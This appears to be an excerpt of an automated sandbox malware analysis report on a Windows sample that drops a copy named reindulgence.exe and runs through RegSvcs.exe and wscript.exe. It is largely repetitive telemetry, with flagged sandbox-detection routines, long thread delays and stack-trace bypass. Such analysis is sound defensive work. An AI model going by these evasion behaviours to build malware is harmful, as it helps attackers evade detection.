Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-97613
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	API/Special instruction interceptor: Address: 128E0A4
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	API/Special instruction interceptor: Address: 1405B6C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598121	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597942	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597634	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597528	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597416	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595074	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594966	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594857	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597739	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2463	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7350	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7949	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1873	Jump to behavior

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	API coverage: 3.8 %
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	API coverage: 3.9 %

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B0DBBE
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00ADC2A2 FindFirstFileExW,	0_2_00ADC2A2
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B168EE FindFirstFileW,FindClose,	0_2_00B168EE
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00B1698F
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B0D076
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B0D3A9
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B19642
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B1979D
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00B19B2B
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B15C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00B15C97
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00FCDBBE
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F9C2A2 FindFirstFileExW,	2_2_00F9C2A2
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD68EE FindFirstFileW,FindClose,	2_2_00FD68EE
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_00FD698F
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00FCD076
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00FCD3A9
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00FD9642
